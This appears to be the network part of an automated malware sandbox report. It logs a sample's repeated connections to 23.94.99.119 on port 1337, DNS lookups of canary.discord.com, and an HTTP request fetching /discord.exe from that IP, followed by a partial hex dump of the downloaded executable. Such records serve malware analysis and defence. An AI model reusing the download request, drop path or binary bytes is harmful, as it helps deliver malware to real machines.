                                                                                    Feb 3, 2023 20:38:42.703980923 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:42.874581099 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:42.880234957 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:43.546150923 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:43.546792984 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:43.713140965 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:43.713175058 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:45.218519926 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:45.219448090 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:45.381529093 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:45.387192011 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:46.046643972 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:46.047230959 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:46.222012043 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:46.222054005 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:47.745275021 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:47.746329069 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:47.915683985 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:47.921495914 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:48.562262058 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:48.563122988 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:48.723623991 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:48.723664999 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:50.234306097 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:50.235982895 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:50.399395943 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:50.405116081 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:51.081871033 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:51.083106995 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:51.250966072 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:51.251250982 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:52.749854088 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:52.750372887 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:52.925702095 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:52.931555986 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:53.580329895 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:53.581110001 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:53.755099058 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:53.756799936 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:54.878114939 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:54.921149969 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:55.265913010 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:55.271200895 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:55.439152956 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:55.444741964 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:56.094382048 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:56.095132113 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:56.257229090 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:56.257271051 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:56.354509115 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:56.529625893 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:57.770706892 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:57.771034956 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:57.943993092 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:57.950316906 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:58.727370024 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:58.727842093 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:38:58.902904034 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:38:58.902954102 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:00.296753883 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:00.297265053 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:00.466680050 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:00.472665071 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:02.401180983 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:02.402348042 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:02.564464092 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:02.580148935 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:02.813973904 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:02.814726114 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:02.978714943 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:02.984462023 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:04.907557011 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:04.908102036 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:05.072694063 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:05.072736979 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:05.329391956 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:05.332148075 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:05.494184017 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:05.506316900 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:07.407461882 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:07.407618046 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:07.569037914 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:07.569089890 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:07.845587015 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:07.845702887 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:08.005809069 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:08.011624098 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:08.908107996 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:09.250426054 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:09.859894037 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:09.923465014 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:09.923825979 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:10.094805002 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:10.094877958 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:10.360716105 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:10.360810995 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:10.525486946 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:10.531183004 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:11.063066959 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:12.423614979 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:12.424209118 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:12.591207981 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:12.591268063 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:12.876651049 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:12.879076958 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:13.047693968 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:13.053117990 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:13.469614029 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:14.938970089 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:14.939105988 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:15.112088919 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:15.112163067 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:15.392558098 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:15.393174887 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:15.560101032 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:15.565656900 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:17.454916954 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:17.455915928 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:17.630290031 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:17.630342960 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:17.929675102 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:17.930147886 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:18.097371101 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:18.101726055 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:18.282432079 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:20.045977116 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:20.046483994 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:20.220746040 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:20.220829964 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:21.604078054 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:21.604352951 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:21.780407906 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:21.786036015 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:22.534605026 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:22.535648108 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:22.701191902 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:22.701225042 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:24.111819029 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:24.112313986 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:24.289942980 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:24.295476913 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:25.052876949 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:25.053369999 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:25.230107069 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:25.230153084 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:25.786752939 CET4968780192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:26.158154964 CET4968780192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:26.627434015 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:26.627439022 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:26.798830986 CET4968780192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:26.799657106 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:26.805361986 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:27.569394112 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:27.569541931 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:27.746848106 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:27.746906042 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:27.892579079 CET4968480192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:28.064486027 CET4968780192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:29.143610954 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:29.143644094 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:29.327054024 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:29.332765102 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:30.065557957 CET496931337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:30.066422939 CET496911337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:30.242314100 CET13374969323.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:30.242346048 CET13374969123.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:30.595967054 CET4968780192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:35.645008087 CET4968780192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:42.707190990 CET496891337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:42.769579887 CET496861337192.168.2.323.94.99.119
                                                                                    Feb 3, 2023 20:39:42.876008987 CET13374968923.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:42.933521032 CET13374968623.94.99.119192.168.2.3
                                                                                    Feb 3, 2023 20:39:45.738164902 CET4968780192.168.2.323.94.99.119

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Feb 3, 2023 20:37:29.979742050 CET5897453192.168.2.38.8.8.8
                                                                                    Feb 3, 2023 20:37:30.003043890 CET53589748.8.8.8192.168.2.3
                                                                                    Feb 3, 2023 20:37:47.236602068 CET6372253192.168.2.38.8.8.8
                                                                                    Feb 3, 2023 20:37:47.256366014 CET53637228.8.8.8192.168.2.3
                                                                                    Feb 3, 2023 20:37:56.903167963 CET6552253192.168.2.38.8.8.8
                                                                                    Feb 3, 2023 20:37:56.923382044 CET53655228.8.8.8192.168.2.3
                                                                                    Feb 3, 2023 20:38:06.720680952 CET5986953192.168.2.38.8.8.8
                                                                                    Feb 3, 2023 20:38:06.740287066 CET53598698.8.8.8192.168.2.3

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Feb 3, 2023 20:37:29.979742050 CET192.168.2.38.8.8.80x5612Standard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:47.236602068 CET192.168.2.38.8.8.80x4c9eStandard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:56.903167963 CET192.168.2.38.8.8.80x1d8Standard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:38:06.720680952 CET192.168.2.38.8.8.80x478eStandard query (0)canary.discord.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Feb 3, 2023 20:37:30.003043890 CET8.8.8.8192.168.2.30x5612No error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:30.003043890 CET8.8.8.8192.168.2.30x5612No error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:30.003043890 CET8.8.8.8192.168.2.30x5612No error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:30.003043890 CET8.8.8.8192.168.2.30x5612No error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:30.003043890 CET8.8.8.8192.168.2.30x5612No error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:47.256366014 CET8.8.8.8192.168.2.30x4c9eNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:47.256366014 CET8.8.8.8192.168.2.30x4c9eNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:47.256366014 CET8.8.8.8192.168.2.30x4c9eNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:47.256366014 CET8.8.8.8192.168.2.30x4c9eNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:47.256366014 CET8.8.8.8192.168.2.30x4c9eNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:56.923382044 CET8.8.8.8192.168.2.30x1d8No error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:56.923382044 CET8.8.8.8192.168.2.30x1d8No error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:56.923382044 CET8.8.8.8192.168.2.30x1d8No error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:56.923382044 CET8.8.8.8192.168.2.30x1d8No error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:37:56.923382044 CET8.8.8.8192.168.2.30x1d8No error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:38:06.740287066 CET8.8.8.8192.168.2.30x478eNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:38:06.740287066 CET8.8.8.8192.168.2.30x478eNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:38:06.740287066 CET8.8.8.8192.168.2.30x478eNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:38:06.740287066 CET8.8.8.8192.168.2.30x478eNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                    Feb 3, 2023 20:38:06.740287066 CET8.8.8.8192.168.2.30x478eNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • canary.discord.com
                                                                                    • 23.94.99.119

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.349685162.159.137.232443C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.349688162.159.137.232443C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    2192.168.2.349690162.159.138.232443C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    3192.168.2.349692162.159.137.232443C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    4192.168.2.34968423.94.99.11980C:\Users\user\Desktop\uBZeAVcb6r.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Feb 3, 2023 20:37:27.672785044 CET101OUTGET /discord.exe HTTP/1.1
                                                                                    Host: 23.94.99.119
                                                                                    Connection: Keep-Alive
                                                                                    Feb 3, 2023 20:37:27.818530083 CET102INHTTP/1.1 200 OK
                                                                                    Date: Fri, 03 Feb 2023 19:37:27 GMT
                                                                                    Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/8.2.0
                                                                                    Last-Modified: Mon, 30 Jan 2023 14:08:02 GMT
                                                                                    ETag: "7800-5f37bbe46bd01"
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 30720
                                                                                    Keep-Alive: timeout=5, max=100
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-msdownload
                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 69 01 d9 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 6e 00 00 00 08 00 00 00 00 00 00 7e 8c 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2a 8c 00 00 4f 00 00 00 00 a0 00 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 98 8b 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 6c 00 00 00 20 00 00 00 6e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 a0 00 00 00 06 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 8c 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 29 00 00 d4 1c 00 00 03 00 02 00 13 00 00 06 68 46 00 00 30 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 19 00 00 0a 00 00 2a 00 00 13 30 02 00 39 00 00 00 01 00 00 11 00 7e 01 00 00 04 14 fe 01 0a 06 2c 22 00 72 01 00 00 70 d0 02 00 00 02 28 1a 00 00 0a 6f 1b 00 00 0a 73 1c 00 00 0a 0b 07 80 01 00 00 04 00 7e 01 00 00 04 0c 2b 00 08 2a 00 00 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 7e 02 00 00 04 0a 2b 00 06 2a 22 00 02 80 02 00 00 04 2a 13 30 01 00 0b 00 00 00 03 00 00 11 00 7e 03 00 00 04 0a 2b 00 06 2a 22 02 28 1d 00 00 0a 00 2a 56 73 06 00 00 06 28 1e 00 00 0a 74 03 00 00 02 80 03 00 00 04 2a ce 02 14 7d 04 00 00 04 02 28 1f 00 00 0a 00 00 02 28 11 00 00 06 00 02 7b 08 00 00 04 25 6f 20 00 00 0a 72 3b 00 00 70 28 21 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 0a 00 2a ba 00 72 75 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 8f 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a ba 00 72 ab 00 00 70 28 23 00 00 0a 26 02 7b 08 00 00 04 25 6f 20 00 00 0a 28 24 00 00 0a 72 cb 00 00 70 28 25 00 00 0a 6f 22 00 00 0a 00 2a 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a 0a 00 2a 00 00 13 30 02 00 2b 00 00 00 04 00 00 11 00 03 2c 0b 02 7b 04 00 00 04 14 fe 03 2b 01
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{i"0n~ @ `*O8 H.textl n `.rsrcp@@.relocv@B^H)hF0E&(*09~,"rp(os~+*0~+*"*0~+*"(*Vs(t*}(({%o r;p(!o"***rup(#&{%o ($rp(%o"*rp(#&{%o ($rp(%o"**&(&**0+,{+
                                                                                    Feb 3, 2023 20:37:27.818583965 CET104INData Raw: 16 0a 06 2c 0e 00 02 7b 04 00 00 04 6f 27 00 00 0a 00 00 02 03 28 28 00 00 0a 00 2a 00 13 30 03 00 06 05 00 00 05 00 00 11 00 d0 04 00 00 02 28 1a 00 00 0a 73 29 00 00 0a 0a 02 73 2a 00 00 0a 7d 05 00 00 04 02 73 2b 00 00 0a 7d 06 00 00 04 02 73
                                                                                    Data Ascii: ,{o'((*0(s)s*}s+}s,}s-}s+}s*}s,}s,}(.{Ks/o0{rpo1{ s2o3{o4{o5{
                                                                                    Feb 3, 2023 20:37:27.818620920 CET105INData Raw: 28 43 00 00 0a 00 02 02 fe 06 0e 00 00 06 73 36 00 00 0a 28 44 00 00 0a 00 02 16 28 45 00 00 0a 00 02 28 46 00 00 0a 00 2a 00 00 13 30 02 00 31 00 00 00 06 00 00 11 73 14 00 00 06 0a 06 28 47 00 00 0a 7d 0e 00 00 04 06 15 7d 0d 00 00 04 06 7c 0e
                                                                                    Data Ascii: (Cs6(D(E(F*01s(G}}|(+|(I*0(oJ(K*"(*0{(Lrp(!}(Mr-p(!}sN}(O(P{(Q
                                                                                    Feb 3, 2023 20:37:27.818650961 CET106INData Raw: 00 72 02 4f 09 0e 00 02 06 4f 09 0e 00 7f 01 4f 09 cb 00 b7 06 00 00 0e 00 d6 01 4f 09 12 00 49 06 68 05 db 00 5b 07 00 00 06 00 8c 05 fc 00 0e 00 4e 06 4f 09 06 00 c5 01 fc 00 06 00 ca 01 1b 06 06 00 e1 0a fc 00 06 00 17 07 fc 00 06 00 eb 0a 58
                                                                                    Data Ascii: rOOOOIh[NOXp24prMa4eMM'bfxO-:B{
                                                                                    Feb 3, 2023 20:37:27.818677902 CET108INData Raw: 09 53 01 61 01 06 01 59 01 19 02 f1 06 61 01 59 01 dd 06 67 01 59 01 eb 09 06 00 29 00 93 00 9c 03 2e 00 0b 00 e1 01 2e 00 13 00 ea 01 2e 00 1b 00 09 02 2e 00 23 00 12 02 2e 00 2b 00 12 02 2e 00 33 00 1e 02 2e 00 3b 00 24 02 2e 00 43 00 30 02 2e
                                                                                    Data Ascii: SaYaYgY)....#.+.3.;$.C0.K:.S$.[.c].k.sC{CCIcc{B@@@`4SXj
                                                                                    Feb 3, 2023 20:37:27.818732023 CET109INData Raw: 65 00 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 79 6e 63 53 74 61 74 65 4d 61 63 68 69 6e 65 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 65 72 53 74 65 70 54 68 72 6f 75 67 68 41 74 74 72 69 62 75 74 65 00 41
